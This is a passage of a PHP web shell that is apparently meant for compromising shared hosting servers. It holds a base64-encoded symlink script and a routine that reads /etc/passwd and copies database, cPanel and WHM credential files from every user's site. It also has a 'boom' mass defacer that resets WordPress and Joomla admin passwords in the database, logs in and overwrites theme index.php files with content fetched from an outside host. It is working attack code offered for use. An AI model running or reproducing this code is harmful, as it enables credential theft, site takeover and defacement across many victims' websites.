zcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcnRpY2xlL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1Od2FoeS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGUvZGIucGhwJywkc2l0ZXNzLictNy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy10cmFpZG50MS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00aW1hZ2VzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmdzLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcmVxdWlyZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLUFNNFNTLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxscy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2xva29tZWRpYS9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wby1jb250ZW50L2NvbmZpZy5waHAnLCRzaXRlc3MsJy1wb3BvamkudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92ZG9fY29uZmlnLnBocCcsJHNpdGVzcywnLVZvb2Rvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2J3X2NvbmZpZy9jb25maWcuaW5pJywkc2l0ZXNzLCctYm9zd2ViLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYndfY29uZmlnL2NvbmZpZy5pbmknLCRzaXRlc3MsJy1ib3N3ZWIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYXRhYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9rb2ZpZ3VyYXNpL2tvbmVrc2kucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmYvY29uZi5waHAnLCRzaXRlc3MsJy11bmtub3duLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2V0ZGF0YWJhc2UucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2RiL3NldGRhdGFiYXNlLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7Cn0KcHJpbnQgIjxicj48YnI+PGJyPjxhIGhyZWY9J2VjYm9zcy8nIHN0eWxlPSdjb2xvcjojMDBGRkZGJz5Eb25lIHwgQ2xpY2sgSGVyZSAhPC9mb250PiI7Cg==';
748$file = fopen("ecini.ler" ,"w+");
749$write = fwrite ($file ,base64_decode($config));
750fclose($file);
751 chmod("ecini.ler",0755);
752 echo "<center><a href='ecboss/ecini.ler'>Click Here !</a></center>";
753} elseif($_GET['do'] == 'config') {
754 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
755 $idx = mkdir("ec_config", 0777);
756 $isi_htc = "Options all\nRequire None\nSatisfy Any";
757 $htc = fopen("ec_config/.htaccess","w");
758 fwrite($htc, $isi_htc);
759 while($passwd = fgets($etc)) {
760 if($passwd == "" || !$etc) {
761 echo "<font color=red>Can't read /etc/passwd</font>";
762 } else {
763 preg_match_all('/(.*?):x:/', $passwd, $user_config);
764 foreach($user_config[1] as $user_idx) {
765 $user_config_dir = "/home/$user_idx/public_html/";
766 if(is_readable($user_config_dir)) {
767 $grab_config = array(
768 "/home/$user_idx/.my.cnf" => "cpanel",
769 "/home/$user_idx/.accesshash" => "WHM-accesshash",
770 "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
771 "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
772 "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
773 "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
774 "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
775 "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
776 "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
777 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
778 "/home/$user_idx/public_html/forum/config.php" => "phpBB",
779 "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
780 "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
781 "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
782 "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
783 "/home/$user_idx/public_html/configuration.php" => "Joomla",
784 "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
785 "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
786 "/home/$user_idx/public_html/wp-config.php" => "WordPress",
787 "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
788 "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
789 "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
790 "/home/$user_idx/public_html/db/db.php" => "Unknown",
791 "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
792 "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
793 "/home/$user_idx/public_html/database/db.php" => "Unknown",
794 "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
795 "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
796 "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
797 "/home/$user_idx/public_html/db/config.php" => "Unknown",
798 "/home/$user_idx/public_html/db/database.php" => "Unknown",
799 "/home/$user_idx/public_html/database/config.php" => "Unknown",
800 "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
801 "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
802 "/home/$user_idx/public_html/konfigurasi/db.php" => "Unknown",
803 "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown");
804 foreach($grab_config as $config => $nama_config) {
805 $ambil_config = file_get_contents($config);
806 if($ambil_config == '') {
807 } else {
808 $file_config = fopen("ec_config/$user_idx-$nama_config.txt","w");
809 fputs($file_config,$ambil_config);
810 }
811 }
812 }
813 }
814 }
815 }
816 echo "<center><a href='?cr0tz=3xcr3w&folder=$dir/ec_config'><font color=lime>Done</font></a></center>";
817} elseif($_GET['do'] == 'boom') {
818 {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? 